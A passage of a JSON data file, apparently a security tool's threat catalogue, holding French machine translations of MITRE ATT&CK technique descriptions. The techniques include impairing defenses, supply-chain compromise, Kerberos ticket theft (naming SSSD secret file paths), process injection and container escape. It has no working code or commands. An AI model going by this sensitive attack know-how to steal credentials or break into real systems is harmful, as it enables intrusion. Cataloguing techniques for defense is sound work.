ex\u00e9cutable portable d\u2019outil d\u2019acc\u00e8s \u00e0 distance qui a \u00e9t\u00e9 cach\u00e9 dans un fichier de certificat. (Citation: Attaque cibl\u00e9e de Malwarebytes contre l\u2019Arabie saoudite) Un autre exemple consiste \u00e0 utiliser la commande Windows copy /b pour r\u00e9assembler des fragments binaires en une charge utile malveillante. (Citation : Carbon Black Obfuscation septembre 2016) Parfois, l\u2019action d\u2019un utilisateur peut \u00eatre n\u00e9cessaire pour l\u2019ouvrir \u00e0 des fins de d\u00e9sobscurcissement ou de d\u00e9chiffrement dans le cadre de [Ex\u00e9cution utilisateur](https://attack.mitre.org/techniques/T1204). L\u2019utilisateur peut \u00e9galement \u00eatre tenu de saisir un mot de passe pour ouvrir un fichier compress\u00e9/chiffr\u00e9 prot\u00e9g\u00e9 par mot de passe fourni par l\u2019adversaire. (Citation : Volexity PowerDuke novembre 2016)\nhttps://attack.mitre.org/techniques/T1140\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1562 - Affaiblir les d\u00e9fenses", - "description": "Les adversaires peuvent modifier de mani\u00e8re malveillante des \u00e9l\u00e9ments de l\u2019environnement d\u2019une victime afin d\u2019entraver ou de d\u00e9sactiver les m\u00e9canismes d\u00e9fensifs. Cela implique non seulement de nuire aux d\u00e9fenses pr\u00e9ventives, telles que les pare-feu et les antivirus, mais \u00e9galement de d\u00e9tecter les capacit\u00e9s que les d\u00e9fenseurs peuvent utiliser pour auditer les activit\u00e9s et identifier les comportements malveillants. Cela peut \u00e9galement couvrir \u00e0 la fois les d\u00e9fenses natives et les fonctionnalit\u00e9s suppl\u00e9mentaires install\u00e9es par les utilisateurs et les administrateurs. Les adversaires peuvent \u00e9galement nuire aux op\u00e9rations de routine qui contribuent \u00e0 l\u2019hygi\u00e8ne d\u00e9fensive, telles que le blocage des utilisateurs de se d\u00e9connecter d\u2019un ordinateur ou l\u2019emp\u00eacher d\u2019\u00eatre arr\u00eat\u00e9. Ces restrictions peuvent en outre permettre des op\u00e9rations malveillantes ainsi que la propagation continue d\u2019incidents. (Citation : Arr\u00eat d\u2019Emotet) Les adversaires pourraient \u00e9galement cibler les m\u00e9canismes d\u2019agr\u00e9gation et d\u2019analyse des \u00e9v\u00e9nements, ou perturber ces proc\u00e9dures en modifiant d\u2019autres composants du syst\u00e8me.\nhttps://attack.mitre.org/techniques/T1562\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1195 - Compromission de la cha\u00eene d\u2019approvisionnement", - "description": "Les adversaires peuvent manipuler les produits ou les m\u00e9canismes de livraison des produits avant leur r\u00e9ception par un consommateur final \u00e0 des fins de compromission des donn\u00e9es ou du syst\u00e8me. La compromission de la cha\u00eene d\u2019approvisionnement peut avoir lieu \u00e0 n\u2019importe quelle \u00e9tape de la cha\u00eene d\u2019approvisionnement, y compris :* Manipulation des outils de d\u00e9veloppement* Manipulation d\u2019un environnement de d\u00e9veloppement* Manipulation de r\u00e9f\u00e9rentiels de code source (publics ou priv\u00e9s)* Manipulation du code source dans les d\u00e9pendances open-source* Manipulation des m\u00e9canismes de mise \u00e0 jour/distribution des logiciels* Images syst\u00e8me compromises/infect\u00e9es (plusieurs cas de supports amovibles infect\u00e9s en usine)(Citation : IBM Storwize)(Citation: Schneider Electric USB Malware) * Remplacement de logiciels l\u00e9gitimes par des versions modifi\u00e9es* Ventes de produits modifi\u00e9s/contrefaits \u00e0 des distributeurs l\u00e9gitimes* Interdiction d\u2019exp\u00e9ditionBien que la compromission de la cha\u00eene d\u2019approvisionnement puisse avoir un impact sur n\u2019importe quel composant du mat\u00e9riel ou des logiciels, les adversaires cherchant \u00e0 obtenir de l\u2019ex\u00e9cution se sont souvent concentr\u00e9s sur des ajouts malveillants \u00e0 des logiciels l\u00e9gitimes dans les canaux de distribution ou de mise \u00e0 jour de logiciels. (Citation : Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation : Command Five SK 2011) Le ciblage peut \u00eatre sp\u00e9cifique \u00e0 un ensemble de victimes souhait\u00e9es ou un logiciel malveillant peut \u00eatre distribu\u00e9 \u00e0 un large \u00e9ventail de consommateurs, mais ne passer qu\u2019\u00e0 des tactiques suppl\u00e9mentaires sur des victimes sp\u00e9cifiques. (R\u00e9f\u00e9rence : Symantec Elderwood, septembre 2012) (Citation : Avast CCleaner3 2018) (Citation : Command Five SK 2011) Les projets open source populaires qui sont utilis\u00e9s comme d\u00e9pendances dans de nombreuses applications peuvent \u00e9galement \u00eatre cibl\u00e9s comme un moyen d\u2019ajouter du code malveillant aux utilisateurs de la d\u00e9pendance. (Citation : Compromis Trendmicro NPM)\nhttps://attack.mitre.org/techniques/T1195\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1190 - Exploiter une application publique", - "description": "Les adversaires peuvent tenter d\u2019exploiter une faiblesse d\u2019un h\u00f4te ou d\u2019un syst\u00e8me Internet pour acc\u00e9der initialement \u00e0 un r\u00e9seau. La faiblesse du syst\u00e8me peut \u00eatre un bogue logiciel, un probl\u00e8me temporaire ou une mauvaise configuration. Les applications exploit\u00e9es sont souvent des sites Web / serveurs Web, mais peuvent \u00e9galement inclure des bases de donn\u00e9es (comme SQL), des services standard (comme SMB ou SSH), des protocoles d\u2019administration et de gestion de p\u00e9riph\u00e9riques r\u00e9seau (comme SNMP et Smart Install) et tout autre syst\u00e8me avec des sockets ouverts accessibles par Internet. (R\u00e9f\u00e9rence : NVD CVE-2016-6662) (Citation : Vuln\u00e9rabilit\u00e9s multiples des PME du SIC) (Citation : US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation : Cisco Blog Legacy Device Attacks) (R\u00e9f\u00e9rence : NVD CVE-2014-7169) Selon la faille exploit\u00e9e, cela peut \u00e9galement impliquer [Exploitation pour l\u2019\u00e9vasion de la d\u00e9fense](https://attack.mitre.org/techniques/T1211). Si une application est h\u00e9berg\u00e9e sur une infrastructure bas\u00e9e sur le cloud et/ou conteneuris\u00e9e, son exploitation peut compromettre l\u2019instance ou le conteneur sous-jacent. Cela peut permettre \u00e0 un adversaire d\u2019acc\u00e9der aux API de cloud ou de conteneur, d\u2019exploiter l\u2019acc\u00e8s de l\u2019h\u00f4te de conteneur via [Escape to Host](https://attack.mitre.org/techniques/T1611) ou de tirer parti de politiques de gestion des identit\u00e9s et des acc\u00e8s faibles. Les adversaires peuvent \u00e9galement exploiter l\u2019infrastructure r\u00e9seau de p\u00e9riph\u00e9rie et les appliances associ\u00e9es, en ciblant sp\u00e9cifiquement les p\u00e9riph\u00e9riques qui ne prennent pas en charge les d\u00e9fenses robustes bas\u00e9es sur l\u2019h\u00f4te. (Citation : Mandiant Fortinet Zero Day) (Citation: Wired Russia Cyberwar) Pour les sites Web et les bases de donn\u00e9es, le top 10 OWASP et le top 25 CWE mettent en \u00e9vidence les vuln\u00e9rabilit\u00e9s Web les plus courantes. (Citation : Top 10 de l\u2019OWASP) (Citation : CWE top 25)\nhttps://attack.mitre.org/techniques/T1190\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1558 - Voler ou falsifier des tickets Kerberos", - "description": "Les adversaires peuvent tenter de subvertir l\u2019authentification Kerberos en volant ou en falsifiant des tickets Kerberos pour activer [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos est un protocole d\u2019authentification largement utilis\u00e9 dans les environnements de domaine Windows modernes. Dans les environnements Kerberos, appel\u00e9s \u00ab realms \u00bb, il existe trois participants de base : client, service et centre de distribution de cl\u00e9s (KDC). (Citation : ADSecurity Kerberos Ring Decoder) Les clients demandent l\u2019acc\u00e8s \u00e0 un service et gr\u00e2ce \u00e0 l\u2019\u00e9change de tickets Kerberos, provenant de KDC, ils obtiennent l\u2019acc\u00e8s apr\u00e8s s\u2019\u00eatre authentifi\u00e9s avec succ\u00e8s. Le KDC est responsable de l\u2019authentification et de l\u2019octroi des tickets. Les adversaires peuvent tenter d\u2019abuser de Kerberos en volant des tickets ou en falsifiant des tickets pour permettre un acc\u00e8s non autoris\u00e9. Sous Windows, l\u2019utilitaire int\u00e9gr\u00e9 klist peut \u00eatre utilis\u00e9 pour r\u00e9pertorier et analyser les tickets Kerberos mis en cache. (R\u00e9f\u00e9rence : Microsoft Klist) Les syst\u00e8mes Linux sur les domaines Active Directory stockent les informations d\u2019identification Kerberos localement dans le fichier de cache d\u2019informations d\u2019identification appel\u00e9 \u00ab ccache \u00bb. Les informations d\u2019identification sont stock\u00e9es dans le fichier ccache tant qu\u2019elles restent valides et g\u00e9n\u00e9ralement pendant la dur\u00e9e de la session d\u2019un utilisateur. (Citation: MIT ccache) Sur les syst\u00e8mes Redhat Enterprise Linux modernes et les distributions d\u00e9riv\u00e9es, le d\u00e9mon System Security Services (SSSD) g\u00e8re les tickets Kerberos. Par d\u00e9faut, SSSD conserve une copie de la base de donn\u00e9es de tickets qui se trouve dans /var/lib/sss/secrets/secrets.ldb ainsi que la cl\u00e9 correspondante situ\u00e9e dans /var/lib/sss/secrets/.secrets.mkey. Les deux fichiers n\u00e9cessitent un acc\u00e8s root pour \u00eatre lus. Si un adversaire est en mesure d\u2019acc\u00e9der \u00e0 la base de donn\u00e9es et \u00e0 la cl\u00e9, l\u2019objet blob Kerberos du cache d\u2019informations d\u2019identification peut \u00eatre extrait et converti en un fichier ccache Kerberos utilisable que les adversaires peuvent utiliser pour [Passer le ticket](https://attack.mitre.org/techniques/T1550/003). Le fichier ccache peut \u00e9galement \u00eatre converti en un format Windows \u00e0 l\u2019aide d\u2019outils tels que Kekeo. (Citation: Linux Kerberos Tickets) (Citation: Apporter MimiKatz \u00e0 Unix) (R\u00e9f\u00e9rence : Kekeo) Les tickets Kerberos sur macOS sont stock\u00e9s dans un format ccache standard, similaire \u00e0 Linux. Par d\u00e9faut, l\u2019acc\u00e8s \u00e0 ces entr\u00e9es ccache est f\u00e9d\u00e9r\u00e9 via le processus d\u00e9mon KCM via le protocole Mach RPC, qui utilise l\u2019environnement de l\u2019appelant pour d\u00e9terminer l\u2019acc\u00e8s. L\u2019emplacement de stockage de ces entr\u00e9es ccache est influenc\u00e9 par le fichier de configuration /etc/krb5.conf et la variable d\u2019environnement KRB5CCNAME qui peut sp\u00e9cifier de les enregistrer sur disque ou de les prot\u00e9ger via le d\u00e9mon KCM. Les utilisateurs peuvent interagir avec le stockage de tickets \u00e0 l\u2019aide de kinit, klist, ktutil et kcc binaires int\u00e9gr\u00e9s ou via le framework Kerberos natif d\u2019Apple. Les adversaires peuvent utiliser des outils open source pour interagir directement avec les fichiers ccache ou utiliser l\u2019infrastructure Kerberos pour appeler des API de niveau inf\u00e9rieur pour extraire les tickets TGT ou Service de l\u2019utilisateur. (Citation: SpectorOps Bifrost Kerberos macOS 2019) (Citation : macOS kerberos framework MIT)\nhttps://attack.mitre.org/techniques/T1558\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1555 - Informations d\u2019identification des magasins de mots de passe", - "description": "Les adversaires peuvent rechercher des emplacements de stockage de mots de passe communs pour obtenir les informations d\u2019identification de l\u2019utilisateur. Les mots de passe sont stock\u00e9s \u00e0 plusieurs endroits sur un syst\u00e8me, en fonction du syst\u00e8me d\u2019exploitation ou de l\u2019application contenant les informations d\u2019identification. Il existe \u00e9galement des applications sp\u00e9cifiques qui stockent les mots de passe pour faciliter la gestion et la maintenance des utilisateurs. Une fois les informations d\u2019identification obtenues, elles peuvent \u00eatre utilis\u00e9es pour effectuer des mouvements lat\u00e9raux et acc\u00e9der \u00e0 des informations restreintes.\nhttps://attack.mitre.org/techniques/T1555\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1567 - Exfiltration sur le service Web", - "description": "Les adversaires peuvent utiliser un service Web externe l\u00e9gitime existant pour exfiltrer des donn\u00e9es plut\u00f4t que leur canal de commande et de contr\u00f4le principal. Les services Web populaires agissant comme un m\u00e9canisme d\u2019exfiltration peuvent fournir une couverture importante en raison de la probabilit\u00e9 que les h\u00f4tes d\u2019un r\u00e9seau communiquent d\u00e9j\u00e0 avec eux avant la compromission. Des r\u00e8gles de pare-feu peuvent \u00e9galement d\u00e9j\u00e0 exister pour autoriser le trafic vers ces services. Les fournisseurs de services Web utilisent \u00e9galement couramment le chiffrement SSL/TLS, offrant aux adversaires un niveau de protection suppl\u00e9mentaire.\nhttps://attack.mitre.org/techniques/T1567\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1219 - Logiciel d\u2019acc\u00e8s \u00e0 distance", - "description": "Un adversaire peut utiliser un support de bureau l\u00e9gitime et des logiciels d\u2019acc\u00e8s \u00e0 distance, tels que Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc., pour \u00e9tablir un canal de commande et de contr\u00f4le interactif pour cibler les syst\u00e8mes au sein des r\u00e9seaux. Ces services sont couramment utilis\u00e9s comme logiciels de support technique l\u00e9gitimes et peuvent \u00eatre autoris\u00e9s par le contr\u00f4le des applications dans un environnement cible. Les outils d\u2019acc\u00e8s \u00e0 distance tels que VNC, Ammyy et Teamviewer sont fr\u00e9quemment utilis\u00e9s par rapport \u00e0 d\u2019autres logiciels l\u00e9gitimes couramment utilis\u00e9s par des adversaires. (Citation : Symantec vivant de la terre) Des outils d\u2019acc\u00e8s \u00e0 distance peuvent \u00eatre install\u00e9s et utilis\u00e9s apr\u00e8s la compromission comme canal de communication alternatif pour un acc\u00e8s redondant ou comme moyen d\u2019\u00e9tablir une session de bureau \u00e0 distance interactive avec le syst\u00e8me cible. Ils peuvent \u00e9galement \u00eatre utilis\u00e9s comme composant de logiciels malveillants pour \u00e9tablir une connexion inverse ou une connexion arri\u00e8re \u00e0 un service ou \u00e0 un syst\u00e8me contr\u00f4l\u00e9 par l\u2019adversaire. L\u2019installation de nombreux outils d\u2019acc\u00e8s \u00e0 distance peut \u00e9galement inclure la persistance (par exemple, la routine d\u2019installation de l\u2019outil cr\u00e9e un [Service Windows](https://attack.mitre.org/techniques/T1543/003)). Des outils d\u2019administration tels que TeamViewer ont \u00e9t\u00e9 utilis\u00e9s par plusieurs groupes ciblant des institutions dans des pays d\u2019int\u00e9r\u00eat pour l\u2019\u00c9tat russe et des campagnes criminelles. (Citation : Rapport sur les menaces mondiales 2015 de CrowdStrike) (Citation: CrySyS Blog TeamSpy)\nhttps://attack.mitre.org/techniques/T1219\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1036 - Mascarade", - "description": "Les adversaires peuvent tenter de manipuler les caract\u00e9ristiques de leurs artefacts pour les faire para\u00eetre l\u00e9gitimes ou b\u00e9nignes aux utilisateurs et/ou aux outils de s\u00e9curit\u00e9. La mascarade se produit lorsque le nom ou l\u2019emplacement d\u2019un objet, l\u00e9gitime ou malveillant, est manipul\u00e9 ou abus\u00e9 dans le but d\u2019\u00e9chapper aux d\u00e9fenses et \u00e0 l\u2019observation. Cela peut inclure la manipulation des m\u00e9tadonn\u00e9es de fichier, inciter les utilisateurs \u00e0 mal identifier le type de fichier et donner des noms de t\u00e2ches ou de services l\u00e9gitimes. Renommer les utilitaires syst\u00e8me abusifs pour \u00e9chapper \u00e0 la surveillance de la s\u00e9curit\u00e9 est \u00e9galement une forme de [Mascarade] (https://attack.mitre.org/techniques/T1036). (Citation : Site principal de LOLBAS)\nhttps://attack.mitre.org/techniques/T1036\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1552 - Informations d\u2019identification non s\u00e9curis\u00e9es", - "description": "Les adversaires peuvent rechercher des syst\u00e8mes compromis pour trouver et obtenir des informations d\u2019identification stock\u00e9es de mani\u00e8re non s\u00e9curis\u00e9e. Ces informations d\u2019identification peuvent \u00eatre stock\u00e9es et/ou \u00e9gar\u00e9es \u00e0 de nombreux endroits sur un syst\u00e8me, y compris des fichiers texte (par exemple, [Bash History](https://attack.mitre.org/techniques/T1552/003)), des r\u00e9f\u00e9rentiels sp\u00e9cifiques au syst\u00e8me d\u2019exploitation ou \u00e0 l\u2019application (par exemple, [Informations d\u2019identification dans le registre](https://attack.mitre.org/techniques/T1552/002)), ou d\u2019autres fichiers / artefacts sp\u00e9cialis\u00e9s (par exemple, [Cl\u00e9s priv\u00e9es](https://attack.mitre.org/techniques/T1552/004)).\nhttps://attack.mitre.org/techniques/T1552\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1055 - Injection dans un processus", - "description": "Les adversaires peuvent injecter du code dans les processus afin d\u2019\u00e9chapper aux d\u00e9fenses bas\u00e9es sur les processus et \u00e9ventuellement d\u2019\u00e9lever les privil\u00e8ges. L\u2019injection de processus est une m\u00e9thode d\u2019ex\u00e9cution de code arbitraire dans l\u2019espace d\u2019adressage d\u2019un processus actif distinct. L\u2019ex\u00e9cution de code dans le contexte d\u2019un autre processus peut permettre d\u2019acc\u00e9der \u00e0 la m\u00e9moire du processus, aux ressources syst\u00e8me/r\u00e9seau et \u00e9ventuellement \u00e0 des privil\u00e8ges \u00e9lev\u00e9s. L\u2019ex\u00e9cution par injection de processus peut \u00e9galement \u00e9chapper \u00e0 la d\u00e9tection des produits de s\u00e9curit\u00e9 puisque l\u2019ex\u00e9cution est masqu\u00e9e dans le cadre d\u2019un processus l\u00e9gitime. Il existe de nombreuses fa\u00e7ons d\u2019injecter du code dans un processus, dont beaucoup abusent de fonctionnalit\u00e9s l\u00e9gitimes. Ces impl\u00e9mentations existent pour tous les principaux syst\u00e8mes d\u2019exploitation, mais sont g\u00e9n\u00e9ralement sp\u00e9cifiques \u00e0 la plate-forme. Des \u00e9chantillons plus sophistiqu\u00e9s peuvent effectuer plusieurs injections de processus pour segmenter les modules et \u00e9chapper davantage \u00e0 la d\u00e9tection, en utilisant des canaux nomm\u00e9s ou d\u2019autres m\u00e9canismes de communication inter-processus (IPC) comme canal de communication.\nhttps://attack.mitre.org/techniques/T1055\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1205 - Signalisation de routage", - "description": "Les adversaires peuvent utiliser la signalisation de routage pour masquer les ports ouverts ou d\u2019autres fonctionnalit\u00e9s malveillantes utilis\u00e9es pour la persistance ou le commandement et le contr\u00f4le. La signalisation de routage implique l\u2019utilisation d\u2019une valeur magique ou d\u2019une s\u00e9quence qui doit \u00eatre envoy\u00e9e \u00e0 un syst\u00e8me pour d\u00e9clencher une r\u00e9ponse sp\u00e9ciale, telle que l\u2019ouverture d\u2019un port ferm\u00e9 ou l\u2019ex\u00e9cution d\u2019une t\u00e2che malveillante. Cela peut prendre la forme de l\u2019envoi d\u2019une s\u00e9rie de paquets avec certaines caract\u00e9ristiques avant l\u2019ouverture d\u2019un port que l\u2019adversaire peut utiliser pour le commandement et le contr\u00f4le. Habituellement, cette s\u00e9rie de paquets consiste en des tentatives de connexion \u00e0 une s\u00e9quence pr\u00e9d\u00e9finie de ports ferm\u00e9s (c\u2019est-\u00e0-dire [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), mais peut impliquer des indicateurs inhabituels, des cha\u00eenes sp\u00e9cifiques ou d\u2019autres caract\u00e9ristiques uniques. Une fois la s\u00e9quence termin\u00e9e, l\u2019ouverture d\u2019un port peut \u00eatre effectu\u00e9e par le pare-feu bas\u00e9 sur l\u2019h\u00f4te, mais peut \u00e9galement \u00eatre impl\u00e9ment\u00e9e par un logiciel personnalis\u00e9. Les adversaires peuvent \u00e9galement communiquer avec un port d\u00e9j\u00e0 ouvert, mais le service qui \u00e9coute sur ce port ne r\u00e9pondra aux commandes ou d\u00e9clenchera d\u2019autres fonctionnalit\u00e9s malveillantes que s\u2019il transmet la ou les valeurs magiques appropri\u00e9es. L\u2019observation des paquets de signaux pour d\u00e9clencher la communication peut \u00eatre effectu\u00e9e par diff\u00e9rentes m\u00e9thodes. Un moyen, impl\u00e9ment\u00e9 \u00e0 l\u2019origine par Cd00r (Citation: Hartrell cd00r 2002), est d\u2019utiliser les biblioth\u00e8ques libpcap pour renifler les paquets en question. Une autre m\u00e9thode exploite des sockets bruts, ce qui permet au malware d\u2019utiliser des ports d\u00e9j\u00e0 ouverts pour une utilisation par d\u2019autres programmes. Sur les p\u00e9riph\u00e9riques r\u00e9seau, les adversaires peuvent utiliser des paquets con\u00e7us pour activer [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) pour les services standard offerts par le p\u00e9riph\u00e9rique, tels que telnet. Une telle signalisation peut \u00e9galement \u00eatre utilis\u00e9e pour ouvrir un port de service ferm\u00e9 tel que telnet, ou pour d\u00e9clencher la modification de module d\u2019implants malveillants sur l\u2019appareil, ajouter, supprimer ou modifier des capacit\u00e9s malveillantes. Les adversaires peuvent utiliser des paquets con\u00e7us pour tenter de se connecter \u00e0 un ou plusieurs ports (ouverts ou ferm\u00e9s), mais peuvent \u00e9galement tenter de se connecter \u00e0 une interface de routeur, \u00e0 une adresse IP de diffusion et d\u2019adresse r\u00e9seau sur le m\u00eame port afin d\u2019atteindre leurs buts et objectifs. (Citation : Cisco Synful Knock Evolution) (Citation : Mandiant - Synful Knock) (Citation : Cisco Blog Legacy Device Attacks) Pour activer cette signalisation de routage sur les p\u00e9riph\u00e9riques embarqu\u00e9s, les adversaires doivent d\u2019abord atteindre et exploiter [Patch System Image](https://attack.mitre.org/techniques/T1601/001) en raison de la nature monolithique de l\u2019architecture. Les adversaires peuvent \u00e9galement utiliser la fonction Wake-on-LAN pour activer les syst\u00e8mes hors tension. Wake-on-LAN est une fonctionnalit\u00e9 mat\u00e9rielle qui permet \u00e0 un syst\u00e8me \u00e9teint d\u2019\u00eatre allum\u00e9, ou r\u00e9veill\u00e9, en lui envoyant un paquet magique. Une fois le syst\u00e8me allum\u00e9, il peut devenir une cible pour les mouvements lat\u00e9raux. (Citation : Bleeping Computer - Ryuk WoL) (Citation : AMD Magic Packet)\nhttps://attack.mitre.org/techniques/T1205\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1218 - Ex\u00e9cution du proxy binaire syst\u00e8me", - "description": "Les adversaires peuvent contourner les d\u00e9fenses bas\u00e9es sur les processus et/ou les signatures en proxy l\u2019ex\u00e9cution de contenu malveillant avec des fichiers binaires sign\u00e9s ou autrement fiables. Les fichiers binaires utilis\u00e9s dans cette technique sont souvent des fichiers sign\u00e9s par Microsoft, ce qui indique qu\u2019ils ont \u00e9t\u00e9 t\u00e9l\u00e9charg\u00e9s \u00e0 partir de Microsoft ou qu\u2019ils sont d\u00e9j\u00e0 natifs dans le syst\u00e8me d\u2019exploitation. (R\u00e9f\u00e9rence : Projet LOLBAS) Les fichiers binaires sign\u00e9s avec des certificats num\u00e9riques approuv\u00e9s peuvent g\u00e9n\u00e9ralement s\u2019ex\u00e9cuter sur des syst\u00e8mes Windows prot\u00e9g\u00e9s par la validation de signature num\u00e9rique. Plusieurs fichiers binaires sign\u00e9s par Microsoft qui sont par d\u00e9faut sur les installations Windows peuvent \u00eatre utilis\u00e9s pour l\u2019ex\u00e9cution par proxy d\u2019autres fichiers ou commandes. De m\u00eame, sur les syst\u00e8mes Linux, les adversaires peuvent abuser des binaires de confiance tels que split pour ex\u00e9cuter par proxy des commandes malveillantes. (Citation : page de manuel divis\u00e9e) (Citation : partez divis\u00e9)\nhttps://attack.mitre.org/techniques/T1218\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1620 - Chargement de code par fichier en mémoire", - "description": "Les adversaires peuvent charger en mémoire du code dans un processus afin de dissimuler l\u2019ex\u00e9cution de charges utiles malveillantes. Le chargement par fichier en mémoire implique l\u2019allocation puis l\u2019ex\u00e9cution de charges utiles directement dans la m\u00e9moire du processus, sans cr\u00e9er un thread ou un processus sauvegard\u00e9 par un chemin de fichier sur le disque. Les charges utiles charg\u00e9es en mémoire peuvent \u00eatre des binaires compil\u00e9s, des fichiers anonymes (uniquement pr\u00e9sents dans la RAM) ou simplement des extraits de code ex\u00e9cutable sans fichier (ex: shellcode ind\u00e9pendant de la position). (Citation : Pr\u00e9sentation de Donut) (Citation: S1 Custom Shellcode Tool) (Citation : Stuart ELF Memory) (Citation: 00sec Droppers) (R\u00e9f\u00e9rence : Mandiant BYOL) L\u2019injection de code par fichier en mémoire est tr\u00e8s similaire \u00e0 [Process Injection](https://attack.mitre.org/techniques/T1055), sauf que l\u2019injection par fichier en mémoire charge le code dans la m\u00e9moire propre des processus au lieu de celle d\u2019un processus s\u00e9par\u00e9. Le chargement par fichier en mémoire peut \u00e9chapper aux d\u00e9tections bas\u00e9es sur les processus, car l\u2019ex\u00e9cution du code arbitraire peut \u00eatre masqu\u00e9e dans un processus l\u00e9gitime ou b\u00e9nin. Le chargement de charges utiles directement en m\u00e9moire peut \u00e9galement \u00e9viter de cr\u00e9er des fichiers ou d\u2019autres artefacts sur le disque, tout en permettant aux logiciels malveillants de garder ces charges utiles chiffr\u00e9es (ou obscurcies) jusqu\u2019\u00e0 leur ex\u00e9cution. (Citation : Stuart ELF Memory) (Citation: 00sec Droppers) (Citation : Intezer ACBackdoor) (Citation: S1 Old Rat New Tricks)\nhttps://attack.mitre.org/techniques/T1620\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1611 - \u00c9vader vers l\u2019h\u00f4te", - "description": "Les adversaires peuvent sortir d\u2019un conteneur pour acc\u00e9der \u00e0 l\u2019h\u00f4te sous-jacent. Cela peut permettre \u00e0 un adversaire d\u2019acc\u00e9der \u00e0 d\u2019autres ressources conteneuris\u00e9es depuis le niveau de l\u2019h\u00f4te ou vers l\u2019h\u00f4te lui-m\u00eame. En principe, les ressources conteneuris\u00e9es doivent fournir une s\u00e9paration claire des fonctionnalit\u00e9s de l\u2019application et \u00eatre isol\u00e9es de l\u2019environnement h\u00f4te. (Citation : Docker Overview) Il existe plusieurs fa\u00e7ons pour un adversaire de s\u2019\u00e9chapper vers un environnement h\u00f4te. Les exemples incluent la cr\u00e9ation d\u2019un conteneur configur\u00e9 pour monter le syst\u00e8me de fichiers de l\u2019h\u00f4te \u00e0 l\u2019aide du param\u00e8tre bind, qui permet \u00e0 l\u2019adversaire de d\u00e9poser des charges utiles et d\u2019ex\u00e9cuter des utilitaires de contr\u00f4le tels que cron sur l\u2019h\u00f4te; l\u2019utilisation d\u2019un conteneur privil\u00e9gi\u00e9 pour ex\u00e9cuter des commandes ou charger un module de noyau malveillant sur l\u2019h\u00f4te sous-jacent ; ou abuser des appels syst\u00e8me tels que \u00ab\u00a0unshare\u00a0\u00bb et \u00ab\u00a0keyctl\u00a0\u00bb pour augmenter les privil\u00e8ges et voler des secrets. (Citation : Docker Bind Mounts) (Citation : Trend Micro Privileged Container) (Citation : Intezer Doki 20 juillet) (Citation : Container Escape) (Citation : Crowdstrike Kubernetes Container Escape) (Citation : Keyctl-unmask) En outre, un adversaire peut \u00eatre en mesure d\u2019exploiter un conteneur compromis avec un socket de gestion de conteneur mont\u00e9, tel que 'docker.sock', pour sortir du conteneur via une [Commande d\u2019administration de conteneur](https://attack.mitre.org/techniques/T1609). (Citation : Container Escape) Les adversaires peuvent \u00e9galement s\u2019\u00e9chapper via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), par exemple en exploitant des vuln\u00e9rabilit\u00e9s dans les liens symboliques globaux afin d\u2019acc\u00e9der au r\u00e9pertoire racine d\u2019une machine h\u00f4te. (Citation : les conteneurs Windows Server sont ouverts) L\u2019acc\u00e8s \u00e0 l\u2019h\u00f4te peut donner \u00e0 l\u2019adversaire l\u2019occasion d\u2019atteindre des objectifs de suivi, tels que l\u2019\u00e9tablissement de la persistance, le d\u00e9placement lat\u00e9ral dans l\u2019environnement ou la mise en place d\u2019un canal de commande et de contr\u00f4le sur l\u2019h\u00f4te.\nhttps://attack.mitre.org/techniques/T1611\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1010 - D\u00e9couverte de la fen\u00eatre d\u2019application", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste des fen\u00eatres d\u2019application ouvertes. Les listes de fen\u00eatres pourraient transmettre des informations sur la fa\u00e7on dont le syst\u00e8me est utilis\u00e9. (Citation: Prevailion DarkWatchman 2021) Par exemple, les informations sur les fen\u00eatres d\u2019application pourraient \u00eatre utilis\u00e9es pour identifier les donn\u00e9es potentielles \u00e0 collecter ainsi que pour identifier les outils de s\u00e9curit\u00e9 ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) \u00e0 \u00e9viter. (Citation: ESET Grandoreiro avril 2020) Les adversaires abusent g\u00e9n\u00e9ralement des fonctionnalit\u00e9s syst\u00e8me pour ce type d\u2019\u00e9num\u00e9ration. Collecter, par exemple, s\u2019il y a lieu, des informations via des fonctionnalit\u00e9s syst\u00e8me natives telles que les commandes [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) et les fonctions [Native API](https://attack.mitre.org/techniques/T1106).\nhttps://attack.mitre.org/techniques/T1010\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1029 - Transfert programm\u00e9", - "description": "Les adversaires peuvent programmer l\u2019exfiltration de donn\u00e9es pour qu\u2019elle ne soit effectu\u00e9e qu\u2019\u00e0 certains moments de la journ\u00e9e ou \u00e0 certains intervalles. Cela pourrait \u00eatre fait pour m\u00e9langer les mod\u00e8les de trafic avec l\u2019activit\u00e9 ou la disponibilit\u00e9 normale. Lorsque l\u2019exfiltration programm\u00e9e est utilis\u00e9e, d\u2019autres techniques d\u2019exfiltration s\u2019appliquent probablement aussi bien pour 